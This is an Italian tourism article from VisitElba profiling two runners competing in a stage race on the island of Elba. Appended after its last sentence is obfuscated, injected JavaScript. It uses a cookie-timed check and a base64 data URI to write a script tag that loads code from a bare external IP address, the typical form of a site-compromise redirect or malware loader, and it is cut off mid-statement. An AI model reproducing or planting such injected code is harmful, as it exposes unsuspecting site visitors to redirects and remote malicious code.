Loro sono Martina Facciani e Luca Benini: non sono solo giovani, belli, sportivi e innamorati ma sono anche i potenziali probabili vincitori del giro podistico a tappe dell’Isola d’Elba. Ad oggi infatti sono entrambi al primo posto in classifica nelle rispettive classi.
Noi di VisitElba abbiamo deciso di intervistarli per voi nella meravigliosa spiaggia di Pareti. Martina è campionessa di Maratona titolo italiano 2016 ed anche è Luca è tra i più forti podisti a livello nazionale.
Entrambi amano l’Elba non solo per il paesaggio ma perché il territorio dell’isola, diversificato e in gran parte incontaminato, si adatta a tutti i tipi di allenamento: salite impegnative sui sentieri sterrati oppure in piana come il percorso di Costa dei Gabbiani dove si sono allenati proprio oggi.
Tra le varie zone dell’Elba, Martina preferisce Rio nell’Elba che definisce più faticoso ma con un panorama di forte impatto, mentre Luca che è un vero amante dei percorsi sterrati ed a picco sul mare ha un debole per Lacona.
Luca è rimasto colpito dal fatto di potere correre circondato dal mare che ha definito caraibico. Ci confida che per lui l’Elba è il compromesso perfetto tra la vacanza sportiva e quella naturale.
Entrambi adorano anche il fatto che quest’Isola sia abbastanza grande da permettere loro di scoprirne una nuova particolarità ogni volta che vengono a trovarci. Martina è stata qui già 4 volte: 2 per sport e 2 come turista e ci ha promesso di tornare in estate con la sorella gemella Valentina, anche lei podista ( se clicchi qui puoi visitare il loro blog: TwinRun) .
Questa stupenda coppia ama unire la passione per lo sport a quella del viaggio e quando gli chiediamo di descrivere la loro esperienza elbana in tre parole ci dicono “solarità, accoglienza e buon vivere”.
Come non adorarli! In bocca a lupo per domani ragazzi … _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘